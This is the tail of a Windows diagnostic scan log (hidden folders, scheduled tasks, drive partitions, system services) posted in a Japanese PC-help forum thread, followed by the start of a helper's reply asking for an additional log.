[2014/04/07 23:17:01 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\MediaAccessibility.resources\en.lproj
[2014/04/07 23:17:01 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\MediaAccessibility.resources\en_GB.lproj
[2015/02/04 08:11:56 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.IE.client.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.MobileSync.client.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.Outlook.client.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.Safari.client.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.WindowsContacts.client.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.WindowsMail.client.resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServicesUI.Resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.IE.client.resources\English.lproj
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.Outlook.client.resources\English.lproj
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.Safari.client.resources\English.lproj
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.WindowsContacts.client.resources\English.lproj
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.WindowsMail.client.resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\iCal.syncschema
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\MailAccounts.syncschema
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Outlook.syncschema
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Bookmarks.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Bookmarks.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Calendars.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Calendars.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Contacts.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Contacts.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\iCal.syncschema\Contents
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\iCal.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\iCal.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\MailAccounts.syncschema\Contents
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\MailAccounts.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\MailAccounts.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Notes.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Notes.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Outlook.syncschema\Contents
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Outlook.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServicesUI.Resources\English.lproj
[2014/07/11 01:11:14 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\EAInstaller\PlantsvsZombies
[2013/08/08 09:41:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Intel Corporation\IAStorUtil
[2010/11/21 16:14:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\microsoft shared\TextConv
[2010/11/21 16:14:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\microsoft shared\Triedit
[2010/11/21 16:25:34 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\microsoft shared\ink\HWRCustomization
[2010/11/21 16:14:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\microsoft shared\TextConv\ja-JP
[2010/11/21 16:14:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\microsoft shared\Triedit\ja-JP
[2012/06/20 12:00:47 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e4074ef21cd4e900a
[2012/06/20 12:00:48 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e4f2f72d1cd4e900e
[2012/06/20 12:00:49 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e57d06fd1cd4e9010
[2012/06/20 12:00:51 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e6a692ff1cd4e9015
[2012/06/20 12:00:53 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e7ac6a5d1cd4e9017
[2012/06/20 12:00:54 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e84e47f01cd4e9019
[2012/06/20 12:00:58 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\eab46af71cd4e901c
[2012/06/20 12:01:01 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\eca127d01cd4e9020
[2012/06/20 12:01:04 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\ee1ba29b1cd4e9023
[2012/06/20 12:01:08 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f0926f441cd4e9025
[2012/06/20 12:01:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f1f0598c1cd4e9027
[2012/06/20 12:01:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f23300141cd4e9029
[2012/06/20 12:01:11 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f2a07f601cd4e902b
[2012/06/20 12:01:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f376bb391cd4e902d
[2012/06/20 12:01:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f3d853a41cd4e9030
[2012/06/20 12:01:14 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f41898cc1cd4e9031
[2012/06/20 12:01:15 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f4cfe2c11cd4e9034
[2012/06/20 12:01:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f59a37b81cd4e9036
[2012/06/20 12:01:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f5fe31831cd4e9038
[2012/06/20 12:01:18 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f6e9d9bf1cd4e903a
[2012/06/20 12:01:18 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f701a7811cd4e903c
[2012/06/20 12:01:19 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f73143071cd4e903e
[2012/06/20 12:01:19 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f74b722a1cd4e9040
[2012/06/20 12:13:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Chs\images
[2012/06/20 12:13:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Cht\images
[2012/06/20 12:13:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Csy\images
[2012/06/20 12:13:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Dan\images
[2012/06/20 12:13:18 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Deu\images
[2012/06/20 12:13:19 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Ell\images
[2012/06/20 12:13:19 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Enu\images
[2012/06/20 12:13:20 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Esp\images
[2012/06/20 12:13:20 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Fin\images
[2012/06/20 12:13:21 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Fra\images
[2012/06/20 12:13:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Hun\images
[2012/06/20 12:13:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Ita\images
[2012/06/20 12:13:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Jpn\images
[2012/06/20 12:13:24 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Kor\images
[2012/06/20 12:13:24 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Nld\images
[2012/06/20 12:13:25 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Nor\images
[2012/06/20 12:13:26 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Plk\images
[2015/08/24 15:09:30 | 000,000,000 | -H-D | M] -- C:\ProgramData\Apple Computer\iTunes\SC Info
[2009/07/14 14:32:38 | 000,000,000 | -H-D | M] -- C:\ProgramData\Microsoft\WwanSvc
[2010/11/21 16:25:02 | 000,000,000 | RH-D | M] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tablet PC
[2009/07/14 14:32:38 | 000,000,000 | -H-D | M] -- C:\ProgramData\Microsoft\WwanSvc\Profiles
[2014/04/01 21:29:29 | 000,000,000 | RH-D | M] -- C:\Users\Default
[2015/08/24 15:09:30 | 000,000,000 | -H-D | M] -- C:\Users\All Users\Apple Computer\iTunes\SC Info
[2009/07/14 14:32:38 | 000,000,000 | -H-D | M] -- C:\Users\All Users\Microsoft\WwanSvc
[2010/11/21 16:25:02 | 000,000,000 | RH-D | M] -- C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Tablet PC
[2009/07/14 14:32:38 | 000,000,000 | -H-D | M] -- C:\Users\All Users\Microsoft\WwanSvc\Profiles
[2009/07/14 12:20:08 | 000,000,000 | -H-D | M] -- C:\Users\Default\AppData
[2014/04/01 21:29:34 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData
[2014/04/09 23:21:59 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Device Metadata\dmrccache\downloads
[2014/04/01 21:31:40 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~
[2015/02/13 17:57:57 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~
[2015/01/09 07:31:54 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Media Player\アート キャッシュ
[2014/04/01 21:31:51 | 000,000,000 | RH-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Windows\Burn\Burn
[2014/05/06 04:02:09 | 000,000,000 | RH-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Windows\Burn\Burn1
[2015/06/16 21:11:40 | 000,000,000 | RH-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Windows\Burn\Burn2
[2015/07/08 21:48:36 | 000,000,000 | RH-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Windows\Burn\Burn3
[2015/06/10 15:43:46 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Roaming\Hangame
[2015/06/10 15:43:45 | 000,565,248 | -H-- | M] (NHN Japan Corp.) -- C:\Users\kaito\AppData\Roaming\Hangame\hgstarterjp.exe
[2015/06/10 17:50:08 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Roaming\Hangame\HUL
[2014/04/16 23:21:26 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned
[2015/06/10 15:28:53 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\IETldCache\Low
[2015/09/14 16:41:09 | 000,000,000 | RH-D | M] -- C:\Users\Public\Desktop
[2009/07/14 11:34:59 | 000,000,000 | RH-D | M] -- C:\Users\Public\Favorites
[2014/04/13 00:58:19 | 000,000,000 | RH-D | M] -- C:\Users\Public\Libraries
[2014/12/19 17:25:39 | 000,000,000 | -H-D | M] -- C:\Windows\ServiceProfiles\LocalService\AppData
[2014/04/02 21:12:09 | 000,000,000 | -H-D | M] -- C:\Windows\ServiceProfiles\NetworkService\AppData

[color=#A23BEC]< %windir%\tasks\*.job >[/color]
[2015/09/14 17:06:00 | 000,000,626 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2015/09/14 00:02:00 | 000,000,644 | ---- | M] () -- C:\Windows\tasks\DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000Core.job
[2015/09/14 17:02:00 | 000,000,696 | ---- | M] () -- C:\Windows\tasks\DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000UA.job
[2015/09/14 15:48:00 | 000,000,686 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2015/09/14 16:48:05 | 000,000,690 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job

[color=#E56717]========== Drive Information ==========[/color]

Physical Drives
---------------

Drive: \\\\.\\PHYSICALDRIVE0 - Fixed hard disk media
Interface type: IDE
Media Type: Fixed hard disk media
Model: WDC WD5000LPVX-22V0TT0
Partitions: 3
Status: OK
Status Info: 0

Partitions
---------------

DeviceID: Disk #0, Partition #0
PartitionType: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: True
Size: 18.00GB
Starting Offset: 1048576
Hidden sectors: 0


DeviceID: Disk #0, Partition #1
PartitionType: Installable File System
Bootable: True
BootPartition: True
PrimaryPartition: True
Size: 100.00MB
Starting Offset: 19328401408
Hidden sectors: 0


DeviceID: Disk #0, Partition #2
PartitionType: Installable File System
Bootable: False
BootPartition: False
PrimaryPartition: True
Size: 448.00GB
Starting Offset: 19433259008
Hidden sectors: 0


[color=#E56717]========== Base Services ==========[/color]
SRV:[b]64bit:[/b] - [2015/03/04 13:41:26 | 000,072,192 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\aelupsvc.dll -- (AeLookupSvc)
SRV:[b]64bit:[/b] - [2013/02/27 14:47:10 | 000,070,144 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\appinfo.dll -- (Appinfo)
SRV:[b]64bit:[/b] - [2009/07/14 10:38:55 | 000,079,360 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\alg.exe -- (ALG)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:51 | 000,849,920 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\qmgr.dll -- (BITS)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:00 | 000,705,024 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\BFE.DLL -- (BFE)
SRV:[b]64bit:[/b] - [2015/05/26 03:18:19 | 000,031,232 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\lsass.exe -- (KeyIso)
SRV:[b]64bit:[/b] - [2009/07/14 10:40:50 | 000,402,944 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\es.dll -- (EventSystem)
SRV - [2009/07/14 10:15:19 | 000,271,360 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\es.dll -- (EventSystem)
SRV:[b]64bit:[/b] - [2012/07/05 07:13:27 | 000,136,704 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\browser.dll -- (Browser)
SRV:[b]64bit:[/b] - [2015/02/03 12:30:56 | 000,187,904 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\cryptsvc.dll -- (CryptSvc)
SRV - [2015/02/03 12:12:14 | 000,143,872 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\cryptsvc.dll -- (CryptSvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:01 | 000,512,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (DcomLaunch)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:00 | 000,317,952 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dhcpcore.dll -- (Dhcp)
SRV - [2010/11/21 12:24:09 | 000,254,464 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\dhcpcore.dll -- (Dhcp)
SRV:[b]64bit:[/b] - [2011/07/14 16:24:58 | 000,183,296 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dnsrslvr.dll -- (Dnscache)
SRV:[b]64bit:[/b] - [2009/07/14 10:40:35 | 000,111,104 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\eapsvc.dll -- (EapHost)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:00 | 000,038,912 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\hidserv.dll -- (hidserv)
SRV - [2009/07/14 10:15:24 | 000,049,152 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\hidserv.dll -- (hidserv)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:10 | 000,359,424 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ipnathlp.dll -- (SharedAccess)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:48 | 000,501,248 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\IPSECSVC.DLL -- (PolicyAgent)
SRV:[b]64bit:[/b] - [2015/04/30 01:53:40 | 000,023,816 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:[b]64bit:[/b] - [2015/04/30 01:53:40 | 000,366,544 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:54 | 000,524,288 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\swprv.dll -- (swprv)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:26 | 000,067,584 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\mmcss.dll -- (MMCSS)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:52 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netman.dll -- (Netman)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:52 | 000,459,776 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofm.dll -- (netprofm)
SRV - [2009/07/14 10:16:03 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\netprofm.dll -- (netprofm)
SRV:[b]64bit:[/b] - [2014/12/06 13:17:27 | 000,303,616 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nlasvc.dll -- (NlaSvc)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:53 | 000,025,600 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nsisvc.dll -- (nsi)
SRV:[b]64bit:[/b] - [2011/09/21 20:51:57 | 000,404,480 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\umpnpmgr.dll -- (PlugPlay)
SRV:[b]64bit:[/b] - [2012/02/11 15:36:02 | 000,559,104 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\spoolsv.exe -- (Spooler)
SRV:[b]64bit:[/b] - [2015/05/26 03:18:19 | 000,031,232 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\lsass.exe -- (ProtectedStorage)
No service found with a name of EMDMgmt
SRV:[b]64bit:[/b] - [2009/07/14 10:41:53 | 000,099,328 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasauto.dll -- (RasAuto)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:17 | 000,344,064 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasmans.dll -- (RasMan)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:01 | 000,512,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (RpcSs)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\seclogon.dll -- (seclogon)
SRV:[b]64bit:[/b] - [2015/05/26 03:18:19 | 000,031,232 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsass.exe -- (SamSs)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:58 | 000,097,280 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wscsvc.dll -- (wscsvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:48 | 000,236,032 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\srvsvc.dll -- (LanmanServer)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:55 | 000,370,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\shsvcs.dll -- (ShellHWDetection)
SRV - [2010/11/21 12:24:03 | 000,328,192 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\shsvcs.dll -- (ShellHWDetection)
No service found with a name of slsvc
SRV:[b]64bit:[/b] - [2010/11/21 12:24:16 | 001,110,016 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\schedsvc.dll -- (Schedule)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:32 | 000,316,928 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\tapisrv.dll -- (TapiSrv)
SRV - [2010/11/21 12:24:00 | 000,242,176 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\tapisrv.dll -- (TapiSrv)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:55 | 000,044,544 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\themeservice.dll -- (Themes)
SRV:[b]64bit:[/b] - [2014/12/19 12:06:55 | 000,210,432 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\profsvc.dll -- (ProfSvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:55 | 001,600,512 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\VSSVC.exe -- (VSS)
SRV:[b]64bit:[/b] - [2015/02/03 12:30:55 | 000,680,960 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioSrv)
SRV:[b]64bit:[/b] - [2015/02/03 12:30:55 | 000,680,960 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioEndpointBuilder)
SRV:[b]64bit:[/b] - [2010/11/21 12:25:06 | 000,170,496 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\sdrsvc.dll -- (SDRSVC)
No service found with a name of WinDefend
SRV:[b]64bit:[/b] - [2010/11/21 12:23:55 | 001,646,080 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wevtsvc.dll -- (eventlog)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:28 | 000,828,416 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\MPSSVC.dll -- (MpsSvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:48 | 000,580,096 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wiaservc.dll -- (stisvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:15 | 000,128,000 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\msiexec.exe -- (msiserver)
SRV - [2010/11/21 12:24:28 | 000,073,216 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWow64\msiexec.exe -- (msiserver)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:56 | 000,242,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wbem\WMIsvc.dll -- (Winmgmt)
SRV:[b]64bit:[/b] - [2015/03/25 12:24:41 | 002,553,856 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wuaueng.dll -- (wuauserv)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:09 | 000,252,416 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\dot3svc.dll -- (dot3svc)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:56 | 000,886,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wlansvc.dll -- (Wlansvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:32 | 000,118,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wkssvc.dll -- (LanmanWorkstation)

[color=#A23BEC]< %SYSTEMDRIVE%\*.exe >[/color]

< End of report >

以上です。
  • あすとろ
  • 2015/09/15 (Tue) 12:01:42
返信フォームへ 
Extraのログは出てませんか?
こんばんは。
今夜はIVNOさんがご多忙みたいなので自分がレスしましょう。

